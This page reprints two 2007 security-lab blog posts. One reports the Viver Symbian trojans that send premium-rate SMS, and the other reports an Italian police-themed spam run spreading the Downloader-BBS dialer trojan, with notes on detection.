- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1
********************************************************************

 

New For-Profit Symbian Trojans
Posted by Jarno @ 12:46 GMT


Viver.B

Yesterday we received a couple of interesting cases from our partner: three new for-profit SMS trojans that affect Symbian S60 2nd Edition and older devices.

The Viver family of trojans claim to be utility programs for Symbian phones. They have been uploaded to at least one popular file sharing site in the hopes that people will download and install them.

After installation, the Viver trojans immediately start sending SMS messages to premium-rate numbers. The messages are sent with proper international area codes, so they are able to reach the correct destination even when activated outside Russia.

We've already seen for-profit malware on mobile devices: Wesber.A and Redbrowser are Java MIDlet trojans that try to send messages to Russian premium-rate numbers. But these trojans require user acceptance for each message and are able to send messages correctly only inside Russia.

But as the Viver family is more advanced and is able to operate anywhere, we find this development worrisome. Prior to 2003 there was little for-profit malware on the PC platform, and now almost all malware is written for one profit motivation or another. It is very likely that more for-profit malware will also appear on mobile platforms.

All three Viver variants are detected with F-Secure Mobile Anti-Virus.

For more information on Viver see Viruslist.com's: Analyst's Diary.

Source: F-Secure : News from the Lab

 

Downloader-BBS: The Italian Job

Thursday May 17, 2007 at 4:35 am CST
Posted by Vinoo Thomas


McAfee Avert Labs encountered a spam run yesterday specifically targeting individuals in Italy using a social engineering technique. The spammed email, worded in Italian, appears to be from the Italian Police and warns users that they have evidence that pirated mp3 files were downloaded onto their computer. The email has been craftily worded and looks convincing enough to dupe recipients into believing the mail is genuine. A copy of the spammed email is as follows:

Spammed Email

Except that makes you wonder: since when did the RIAA team up with the Italian police? ;-)

Such targeted attacks on specific countries or communities are becoming more and more frequent. German internet users must be sick of weekly spam runs of the Downloader-AAP trojan with similar social engineering themes. A typical spam run lasts for a few hours and is usually seeded from a botnet of infected computers. Malware authors typically create a single-use disposable trojan and test it against detection by popular antivirus vendors, tweaking it until it becomes undetected. This gives the trojan a better shelf life in the wild in order to evade proactive detection by antivirus software. The next time a spam run is executed, a new variant is used, and this vicious cycle continues. It has also been observed that the same binary is never used again in another spam run.

The mass spammed Downloader-BBS sample in this case arrives in a password protected archive with the password specified in the message body. Once executed it downloads a dialer program designed to connect to a premium-rate number from a remote web server based in Russia.

You would think most folks would be wary of opening a password protected attachment and inputting the password to execute the payload. But with millions of newbie users using the internet, morbid curiosity will always get the better of someone who is receiving such a type of email for the first time.

Detection for this threat is already available in the beta DATs and will be released in today's 5033 DATs.


Source: Computer Security Research - McAfee Avert Labs Blog
